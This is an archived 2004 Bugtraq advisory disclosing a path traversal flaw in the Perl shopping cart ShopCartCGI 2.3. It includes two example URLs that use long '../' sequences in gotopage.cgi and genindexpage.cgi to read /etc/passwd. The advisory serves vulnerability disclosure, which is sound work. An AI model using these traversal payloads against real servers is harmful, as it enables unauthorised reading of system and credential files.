lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040217094512.15322.qmail@www.securityfocus.com> Date: 17 Feb 2004 09:45:12 -0000 From: ZetaLabs <zetalabs@...e-h.org> To: bugtraq@...urityfocus.com Subject: ZH2004-06SA (security advisory): ShopCartCGI v2.3 Remote arbitrary file retrieving ZH2004-06SA (security advisory): ShopCartCGI v2.3 Remote arbitrary file retrieving Published: 17 february 2004 Released: 17 february 2004 Name: ShopCartCGI Affected Systems: 2.3 Issue: Remote arbitrary file retrieving Author: G00db0y from Zone-h Security Labs - g00db0y@...e-h.org - zetalabs@...e-h.org Vendor: http://www.ggmate.com Description *********** Zone-h Security Team has discovered a flaw in ShopCartCGI 2.3. There is a vulnerability in the current version of ShopCartCGI that allows an attacker to retrieve arbitrary files from the webserver with its priviledges. "ShopCartCGI is a set of scripts written in Perl to make it easy for you to design and maintain your own WEB Shopping Cart system. The major advantages of this software is that you design your WEB pages based on a simple template. The template provides the mechanisms of form data entry using CGI." Details ******* It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem. For example try this: http://address/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd http://address/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd Solution: ********* The vendor has been contacted and a patch was not yet produced. G00db0y from Zone-h Security Labs - G00db0y@...e-h.org - zetalabs@...e-h.org http://www.zone-h.org/en/advisories/read/id=3962/